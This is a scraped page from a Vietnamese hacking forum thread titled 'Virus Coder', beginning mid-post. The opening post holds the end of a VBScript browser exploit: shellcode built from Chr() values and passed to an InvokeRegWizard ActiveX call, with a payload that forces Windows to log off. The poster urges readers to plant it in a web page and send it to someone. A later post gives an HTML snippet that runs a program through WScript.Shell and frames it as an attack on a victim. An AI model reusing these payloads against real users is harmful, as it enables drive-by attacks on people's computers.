expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "rundll32 shell32.dll,SHExitWindowsEx 1"
RegWizObj.InvokeRegWizard(expstr)
</script>
</html>
ác bạn hãy đưa nó vào mã nguồn của trang web và goiử nó đi cho một người nào đó thử nghiệm coi hay lắm |
|
|
|
|
| [Question] Virus Coder |
12/12/2006 11:49:38 (+0700) | #15 | 29995 |
|
hack9x
Member
|
|
0 |
|
|
Joined: 11/12/2006 23:15:02
Messages: 20
Location: hà nội
Offline
|
|
một đoạn mã nhỏ đưa vào html có thể khiển đối phương chjết không kịp ngáp
<html>
<head>
<title>L0ng3ta</title>
</head>
<body >
<p>chuong trinh notepad se thuc thi
<script language=VBSCRIPT>
On Error Resume Next
Set WSHShell = CreateObject("WScript.Shell")
WSHShell.Run "c:\windows\notepad.exe",1,False
</SCRIPT></p>
</body>
</html>
|
|
|
|
|
| [Question] Virus Coder |
26/02/2007 04:30:59 (+0700) | #16 | 43118 |
format
Member
|
|
0 |
|
|
Joined: 29/06/2006 22:08:58
Messages: 29
Offline
|
|
ôi trời
kiếm lại được bài này mừng quá
trước đây bị NAV nó xóa đến hôm nay mới tìm lại được |
|
|
|
|
| [Question] Virus Coder |
02/03/2007 03:41:12 (+0700) | #17 | 43970 |
![[Avatar]](/hvaonline/images/avatar/273d7ee6ede77729d96711f6df0bf2d1.png "[Avatar]")
|
delua
Locked
|
|
0 |
|
|
Joined: 28/12/2006 00:48:39
Messages: 102
Offline
|
|
| Đâu dễ xơi như thế mấy bồ ! |
|
|
|
|
| [Question] Virus Coder |
04/03/2007 04:28:08 (+0700) | #18 | 44367 |
|
hack9x
Member
|
|
0 |
|
|
Joined: 11/12/2006 23:15:02
Messages: 20
Location: hà nội
Offline
|
|
| sao lại dễ sơi hả mà là sơi ngon đó sơi đi còn gì |
|
|
|
|
| [Question] Virus Coder |
04/03/2007 08:01:36 (+0700) | #19 | 44419 |
|
delua
Locked
|
|
0 |
|
|
Joined: 28/12/2006 00:48:39
Messages: 102
Offline
|
|
Virus thời tiền sử thế này thì chỉ cần save as là anti túm cổ ngay lập tức !!!
Có lẽ bạn nên test trước !
|
|
|
|
|
| [Question] Re: Virus Coder |
20/07/2008 01:33:11 (+0700) | #20 | 142343 |
hackingvietnam
Member
|
|
0 |
|
|
Joined: 18/07/2008 14:23:00
Messages: 26
Location: ..netlux..org..
Offline
|
|
Hic minh ghé qua chủ đề nóng bỏng này và thật rất có tình cảm vối các anh em trong diễn đàn, .....
Có hôm em đọc báo, và thông tin nhận được là có công cụ của nước ngoài ghi ra CD rồi tung ra thị trương nhất là ở tp HCM lớn của cả nước, chính diều đó mà trong thời gian gần đây ngập tràn virus việt nhất là trojan, thật là buồn,riêng mình có ý kiến thì khi mình sáng tạo nên sáng tạo cái hay chứ đừng cái dỡ là được,được như các anh đó mà viết phần mềm diệt virus thì tự hào thay cho việt nam ta.....ko bàn luận gì thêm....
Nay mình muốn xin thông tin về cách tạo chương trinh anti với mã nguồn chương trình anti calam mã nguồn mỡ.>?< chân thành cảm ơn moị người !<>!!!!<>! |
|
|
| Users currently in here |
|
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thảo luận virus, trojan, spyware, worm...
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
![[Email]](/hvaonline/templates/viet/images/icon_email.gif "[E-mai]"){kind=icon}
![[WWW]](/hvaonline/templates/viet/images/icon_www.gif "[www]"){kind=icon}
![[Yahoo!]](/hvaonline/templates/viet/images/icon_yim.gif "[YIM]"){kind=icon}
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")